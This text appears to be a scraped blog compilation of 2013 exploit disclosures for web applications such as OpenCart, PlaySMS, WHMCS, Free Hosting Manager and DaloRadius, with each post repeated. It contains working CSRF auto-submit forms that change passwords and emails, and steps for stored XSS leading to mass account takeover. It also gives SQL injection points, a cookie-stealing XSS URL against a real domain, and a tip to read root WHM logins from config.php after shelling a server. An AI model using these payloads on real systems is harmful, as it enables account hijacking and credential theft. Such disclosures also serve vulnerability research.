# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/profile.php" method=post >
<input type=hidden size=30 maxlength=30 name=userid value="5">
<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
<input type=submit name=btnSaveChanges class=button value='Save'>
</form>
</html>
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
http://www.exploit-db.com/exploits/30177/
# Exploit Title : PlaySMS <= 0.9.9.2 CSRF
# Date : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:
#Independent Pakistani Security Researcher
# Exploit Title : PlaySMS <= 0.9.9.2 CSRF
# Date : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">
<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>
<input type=submit class=button value='Save'>
</form>
</html>
#Independent Pakistani Security Researcher
Welcome once again :D
Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541
So i just start to pentest the plugin and in just two minutes i found the bug.
So here are the details
Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2
The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php
POC
code:
#Independent Pakistani Security Researcher
Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541
So i just start to pentest the plugin and in just two minutes i found the bug.
So here are the details
Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2
The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php
POC
code:
1 if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
2 if(isset($_GET['usertooltip']))http://localhost/Upload/ajaxfs.php?usertooltip=1'
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1Google DORK : inurl:ajaxfs.php
#Independent Pakistani Security Researcher
Hi all , was alot busy with my work , so now here comes some new stuff PHP object injection in all whmcs versions.
http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717
# Exploit Title : WHMCS <=5.2.12 PHP Object Injection
:Web Host Manager Complete Solution
# Date : 2013/10/24
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.whmcs.com
# Author HomePage : http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#PHP Object Injection
#Affected Versions:
WHMCS <=5.2.12
#Vulnerability Description
Poc
The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes S_COOKIE data to unserialize function without sanitizing it.
Code on Line 711
$sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
$sortdata = unserialize( base64_decode( $sortdata ) );
User input passed through the Cookies is not properly sanitized before being used in
an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the
application scope.
Some of the files which are calling sortableint() function are
/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php
#Independent Pakistani Security Researcher
http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717
# Exploit Title : WHMCS <=5.2.12 PHP Object Injection
:Web Host Manager Complete Solution
# Date : 2013/10/24
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.whmcs.com
# Author HomePage : http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#PHP Object Injection
#Affected Versions:
WHMCS <=5.2.12
#Vulnerability Description
Poc
The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes S_COOKIE data to unserialize function without sanitizing it.
Code on Line 711
$sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
$sortdata = unserialize( base64_decode( $sortdata ) );
User input passed through the Cookies is not properly sanitized before being used in
an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the
application scope.
Some of the files which are calling sortableint() function are
/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php
#Independent Pakistani Security Researcher
Hi , from last some days i was pentesting Opencart A Shopping Cart System .
www.opencart.com
And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.
So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . . now this is quite embarrassing that the latest version is still vuln :(
I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .
Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/
# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple Poc to change user Password
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
edit
www.opencart.com
And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.
So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . . now this is quite embarrassing that the latest version is still vuln :(
I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .
Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/
# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple Poc to change user Password
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
edit
OpenCart <= 1.5.6.1 SQL Injection
#Independent Pakistani Security Researcher
Hi , today OpenCart .
Just setup Opencart to give it a pen-test and here is initial results.
Oka Bug
OpenCart Disclose the Local Path Of server on many location , Some of them are . .
http://localhost/opencart/upload/catalog/controller/account/address.php
http://localhost/opencart/upload/catalog/controller/account/account.php
http://localhost/opencart/upload/catalog/controller/account/order.php . . .etc
Live Demo
OpenCart Own Domain
http://demo.opencart.com/catalog/controller/account/address.php
http://spotonsolutions.net/catalog/controller/account/address.php
How this issue comes And patching . . . .
When you are including different php file in one file and declaration of some variable / function in first file and using that variable / function in that file you included second.Now if this second file access by anyone directly you will got some error like ...
Variable undeclared..
Class not found blah blah.
Like we have index.php with code
include('1.php');
include('2.php');
Code of 1.php
class a {
public :
$count=0;
}
Code of 2.php
$classs = new a();
Now as you see if you access 2.php directly you will got error
Class a not found.
Because class a is define in 1.php
But if you access index.php
it will work perfect as
their is class a in 1.php and then 2.php is using that class..
So this is how many times LPD occurs.
Patching . . . .
Simplest patching
turn error reporting off .
Or
You can also do .htaccess
Order deny,allow
Deny from all
Or
You can do this
Just declare any variable in index.php or in that file you will going to include 1.php and 2.php
like
if (!defined("direct access")) {
define('
}
and then just add this on top of 1.php and 2.php
defined('
what it does simply main file declare a variable and the included files check if that variable is set or not..As you already set the value in main file it will run perfectly.
But if you direct access those files that are included in main file.then as they check if variable is set or not and in direct accessing the file will not have that variable set so it will go in die showing u access denied.
So this for today..
# Independent Pakistani Security Researcher
Just setup Opencart to give it a pen-test and here is initial results.
Oka Bug
OpenCart Disclose the Local Path Of server on many location , Some of them are . .
http://localhost/opencart/upload/catalog/controller/account/address.php
http://localhost/opencart/upload/catalog/controller/account/account.php
http://localhost/opencart/upload/catalog/controller/account/order.php . . .etc
Live Demo
OpenCart Own Domain
http://demo.opencart.com/catalog/controller/account/address.php
http://spotonsolutions.net/catalog/controller/account/address.php
How this issue comes And patching . . . .
When you are including different php file in one file and declaration of some variable / function in first file and using that variable / function in that file you included second.Now if this second file access by anyone directly you will got some error like ...
Variable undeclared..
Class not found blah blah.
Like we have index.php with code
include('1.php');
include('2.php');
Code of 1.php
class a {
public :
$count=0;
}
Code of 2.php
$classs = new a();
Now as you see if you access 2.php directly you will got error
Class a not found.
Because class a is define in 1.php
But if you access index.php
it will work perfect as
their is class a in 1.php and then 2.php is using that class..
So this is how many times LPD occurs.
Patching . . . .
Simplest patching
turn error reporting off .
Or
You can also do .htaccess
Order deny,allow
Deny from all
Or
You can do this
Just declare any variable in index.php or in that file you will going to include 1.php and 2.php
like
if (!defined("direct access")) {
define('
direct access
', true);}
and then just add this on top of 1.php and 2.php
defined('
direct access
') or die("Access Denied.");what it does simply main file declare a variable and the included files check if that variable is set or not..As you already set the value in main file it will run perfectly.
But if you direct access those files that are included in main file.then as they check if variable is set or not and in direct accessing the file will not have that variable set so it will go in die showing u access denied.
So this for today..
# Independent Pakistani Security Researcher
Hi , today concrete
Concrete is a famous Content management system.
For more
www.concrete5.org
So i was just pen-testing it a bit and initially just found that It is not using any security token to protect making
admin/users logout (CSRF).
http://localhost/concrete/index.php/login/logout/
In simple terms just by sending this link to any user which has valid session will going to logout.
Header:
GET http://localhost/concrete/index.php/login/logout/
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive
oka XSS
I found XSS inside the admin panel but still every thing should be secure.
Bug
Concrete is not sanitizing the POST field user input of tags.
When you are making a post to publish on the blog their is an option to enter the TAG for the post.
So this POST filed is vulnerable to XSS.
Goto Write post inside admin panel-->then just enter any XSS vector in TAG filed and you will get results.
And it is store/persistent XSS.
So this is for today.
#independent Pakistani Security Researcher
Concrete is a famous Content management system.
For more
www.concrete5.org
So i was just pen-testing it a bit and initially just found that It is not using any security token to protect making
admin/users logout (CSRF).
http://localhost/concrete/index.php/login/logout/
In simple terms just by sending this link to any user which has valid session will going to logout.
Header:
GET http://localhost/concrete/index.php/login/logout/
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive
oka XSS
I found XSS inside the admin panel but still every thing should be secure.
Bug
Concrete is not sanitizing the POST field user input of tags.
When you are making a post to publish on the blog their is an option to enter the TAG for the post.
So this POST filed is vulnerable to XSS.
Goto Write post inside admin panel-->then just enter any XSS vector in TAG filed and you will get results.
And it is store/persistent XSS.
So this is for today.
#independent Pakistani Security Researcher
Hi , for today Free hosting manager.Free hosting manager is a free script to install and run your hosting.
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.
Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.
Proof Of Concept
In home.php
Calling a function auth() and what it is
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only using stripslahes which will not protect against doing sql injection attack.
#independent Pakistani Security Researcher
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.
Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.
Proof Of Concept
In home.php
Calling a function auth() and what it is
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only using stripslahes which will not protect against doing sql injection attack.
#independent Pakistani Security Researcher
Hi , some days ago found a XSS bug in Paypal Services but was not eligible to get the bounty ,well no worries will try again :D . . .
It was subdomain of billmelater.com
Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com
They are getting integer value from the GET Field and using it as time to redirect you on other pages..
Vuln Link :
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
So this is for today :)
#IndependentPakistaniSecurityResearcher
It was subdomain of billmelater.com
Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com
They are getting integer value from the GET Field and using it as time to redirect you on other pages..
Vuln Link :
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
So this is for today :)
#IndependentPakistaniSecurityResearcher
Hi , just browsing Sourceforge and see a script having more than 1 thousand downloads per week , so not bad to give it a pentest and found some stuff in it :)
Exploit Links
http://www.exploit-db.com/exploits/24849
http://1337day.com/exploit/20513
http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html
Exploit
Exploit Links
http://www.exploit-db.com/exploits/24849
http://1337day.com/exploit/20513
http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html
Exploit
-------------------------------------------------------------------------
# Software : DaloRadius SQLi / CSRF / XSS
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 15/3/13
# Vendors : http://www.daloradius.com/
# Download Link : http://sourceforge.net/projects/daloradius/
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+
DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations.
Some OF them..
Change Admin Password
<form action="daloradius/config-operators-edit.php" method="post">
<input type="hidden" value="administrator" name="operator_username" />
<div class="tabber">
<div class="tabbertab" title="Operator Info">
<fieldset>
<h302></h302>
<br/>
<label for='operator_password' class='form'></label>
<input name='password' id='password'
type='hidden' value='radius1' tabindex=101 />
<br/>
<br/><br/>
<hr><br/>
<input type='submit' name='submit' value='Apply' class='button' />
Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540
Post Data:
operator_username=administrator&password=radius1&submit=Apply
+---+[ SQL Injection ]+---+
Their are multiple SQLI in the script some are..
